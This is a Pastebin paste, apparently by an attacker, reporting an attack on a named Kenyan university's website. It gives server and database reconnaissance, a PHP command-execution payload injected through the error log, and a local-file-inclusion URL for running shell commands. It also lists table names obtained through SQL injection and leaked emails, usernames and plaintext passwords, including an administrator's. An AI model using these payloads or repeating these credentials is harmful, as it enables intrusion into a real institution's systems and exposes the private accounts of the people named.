Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Morning @lexxkinyanjui
- Exploit target:www.jkuat.ac.ke
- Host IP:41.204.161.16
- Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/1.0.0d FrontPage/5.0.2.2635 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_perl/2.0.5 Perl/v5.12.3
- Powered-by: PHP/5.3.6
- DB Server: MySQL >=5
- Current User: jkuat_jkuat@localhost
- Sql Version: 5.1.58-log
- Current DB: jkuat_jkuat
- System User: jkuat_jkuat@localhost
- Host Name: cp-uon.kenet.or.ke
- Installation dir: /usr/local/
- DB User: 'jkuat_jkuat'@'localhost'
- Data Bases: information_schema
- jkuat_jkuat
- With hii info you can chose the attack you want because you have the DB and server type:
- If unataka an RFI or LFI attack you can use some of my code:
- http://www.jkuat.ac.ke/jamesscript=<? passthru(\$_GET[cmd]) ?>
- This will add a line into error_log injecting my code . And
- now? we only have to load this file send
- by cmd variable the command we'd like to execute:
- for example:http://www.jkuat.ac.ke/?file=../../../var/apache/error_log&cmd=uname -a
- But this will be risky because they can resolve ur address and/are location,plus windows is not that advanced
- to handle more than 200port connections:
- so SQL injection with ' working a little magic here is what i got:
- DATABASE:jkuat_jkuat
- Table Name Columns
- tbl_user email password username
- tbl_units
- tbl_section
- tbl_programme_category
- tbl_programme
- tbl_links
- tbl_head
- tbl_faculty
- tbl_downloads_category
- tbl_downloads
- tbl_department
- tbl_contacts_main
- tbl_contacts
- tbl_comments
- tbl_campus_programme
- tbl_campus
- tbl_article
- tbl_announcement
- sasa kutoka hapo kama tuna table ya users ambayo ina email,passwords and username tuna spoof tena
- and we get
- email password username
- info@jkuat.ac.ke admin 89admin245
- kamochu@gmail.com kamochu001 kamochu
- DATABASE:information_schema
- Table Name Columns
- VIEWS
- USER_PRIVILEGES IS_GRANTABLE PRIVILEGE_TYPE TABLE_CATALOG GRANTEE
- TRIGGERS
- TABLE_PRIVILEGES
- TABLE_CONSTRAINTS
- TABLES
- STATISTICS
- SESSION_VARIABLES VARIABLE_VALUE VARIABLE_NAME
- SESSION_STATUS
- SCHEMA_PRIVILEGES
- SCHEMATA SQL_PATH DEFAULT_COLLATION_NAME DEFAULT_CHARACTER_SET_NAME SCHEMA_NAME CATALOG_NAME
- ROUTINES
- REFERENTIAL_CONSTRAINTS
- PROFILING SOURCE_LINE SOURCE_FILE SOURCE_FUNCTION SWAPS PAGE_FAULTS_MINOR PAGE_FAULTS_MAJOR MESSAGES_RECEIVED MESSAGES_SENT BLOCK_OPS_OUT BLOCK_OPS_IN CONTEXT_INVOLUNTARY CONTEXT_VOLUNTARY CPU_SYSTEM CPU_USER DURATION STATE SEQ QUERY_ID
- PROCESSLIST
- PLUGINS
- PARTITIONS
- KEY_COLUMN_USAGE
- GLOBAL_VARIABLES
- GLOBAL_STATUS
- FILES
- EVENTS
- ENGINES
- COLUMN_PRIVILEGES
- COLUMNS
- COLLATION_CHARACTER_SET_APPLICABILITY
- COLLATIONS
- CHARACTER_SETS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement